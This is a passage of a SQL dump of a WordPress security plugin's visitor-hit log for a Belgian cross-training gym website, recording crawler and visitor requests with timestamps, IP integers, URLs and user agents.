(72891, 1495015608.513500, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(72892, 1495015613.117772, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(72893, 1495015617.689147, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(72894, 1495020635.180341, 632936182, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72895, 1495024317.672399, 2503519569, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(72896, 1495027760.335194, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72897, 1495027760.528571, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72898, 1495030761.064527, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(72899, 1495030761.874369, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72900, 1495030762.348589, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72901, 1495030762.770413, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72902, 1495030763.446877, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72903, 1495030763.933538, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72904, 1495030764.414277, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72905, 1495030765.240912, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72906, 1495030765.906928, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72907, 1495030767.753653, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72908, 1495030768.245275, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72909, 1495030768.909427, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72910, 1495030770.064141, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72911, 1495030770.471783, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72912, 1495031540.802819, 3024883467, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/contact-form-7/includes/js/\\\'+m.iframeSrc+\\\'', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72913, 1495031919.795939, 872366417, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(72914, 1495031939.545386, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(72915, 1495032646.567509, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72916, 1495032647.095220, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(72917, 1495037155.935152, 1584254022, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72918, 1495038712.507721, 1342987974, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.clublesmills.com/recherche/profil_club.php?id=12573', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72919, 1495038714.706957, 1342987974, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72920, 1495038951.487680, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(72921, 1495038951.982450, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(72922, 1495038967.614628, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(72923, 1495038973.021821, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(72924, 1495039145.522785, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(72925, 1495039146.033030, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(72926, 1495041759.068654, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(72927, 1495041759.670782, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(72928, 1495045388.314418, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(72929, 1495045388.779902, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72930, 1495045389.222414, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72931, 1495045389.619250, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72932, 1495045390.334263, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72933, 1495045390.788642, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72934, 1495045391.276278, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72935, 1495045391.787130, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72936, 1495045392.209342, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72937, 1495045392.631178, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72938, 1495045393.021182, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72939, 1495045393.536885, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72940, 1495045393.970701, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72941, 1495045394.387669, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72942, 1495045550.290341, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72943, 1495045551.026232, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72944, 1495045551.432201, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72945, 1495045551.844655, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72946, 1495045552.274126, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72947, 1495045552.706737, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72948, 1495045553.245866, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72949, 1495045553.667188, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72950, 1495045554.191264, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72951, 1495045554.657696, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72952, 1495045555.077884, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72953, 1495045567.543599, 1834524421, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72954, 1495045571.631030, 1834524421, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72955, 1495045774.912257, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72956, 1495046654.237513, 1538350214, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72957, 1495046744.724590, 1538350214, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72958, 1495046792.898260, 1538350214, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72959, 1495046799.705460, 1538350214, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72960, 1495053788.333367, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(72961, 1495053788.795832, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72962, 1495053789.220263, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72963, 1495053789.639142, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72964, 1495053790.133557, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72965, 1495053790.629933, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72966, 1495053791.044750, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72967, 1495053791.546843, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72968, 1495053791.967529, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72969, 1495053792.419092, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72970, 1495053792.920764, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72971, 1495053793.432555, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72972, 1495053793.927616, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72973, 1495053794.346873, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72974, 1495055298.670013, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72975, 1495059885.406104, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72976, 1495066896.151763, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72977, 1495067232.400790, 1538452237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72978, 1495067232.991449, 1538452237, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72979, 1495067233.509674, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72980, 1495067234.034648, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72981, 1495067234.654837, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72982, 1495067235.158110, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72983, 1495067235.619687, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72984, 1495067236.094212, 1538452237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72985, 1495067236.554804, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72986, 1495067236.980625, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72987, 1495067237.416785, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72988, 1495067237.923722, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72989, 1495067238.420654, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72990, 1495067238.908144, 1538452237, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.1.30.0.34 CFNetwork/811.4.18 Darwin/16.5.0 (x86_64)'),
(72991, 1495070999.214559, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72992, 1495070999.294702, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72993, 1495084583.583570, 1539837019, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/535.28.70 (KHTML, like Gecko) Chrome/53.7.2988.8250 Safari/531.88'),
(72994, 1495084588.599996, 1539837019, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/535.28.70 (KHTML, like Gecko) Chrome/53.7.2988.8250 Safari/531.88'),
(72995, 1495092231.001128, 86661764, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/modules.php', 'http://crosstrainingcenter.be/wp-includes/css/modules.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72996, 1495094785.722117, 786801764, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(72997, 1495095557.363493, 3024883478, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72998, 1495096258.441665, 3488736748, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)'),
(72999, 1495107714.364261, 3267064321, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&sqi=2&ved=0ahUKEwjtxsmervnTAhUNZFAKHQZDCHgQ_BcIjAEwEA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(73000, 1495113381.886059, 1538646836, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73001, 1495114269.390292, 1834607884, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73002, 1495114287.605551, 1834607884, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73003, 1495114308.826691, 2637637399, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73004, 1495114308.826858, 2637637399, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73005, 1495116177.669795, 2637637399, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73006, 1495116178.169492, 2637637399, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73007, 1495117342.023627, 783539426, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73008, 1495117342.615376, 783539426, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73009, 1495117343.122395, 783539426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73010, 1495117343.628144, 783539426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73011, 1495117344.145003, 783539426, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
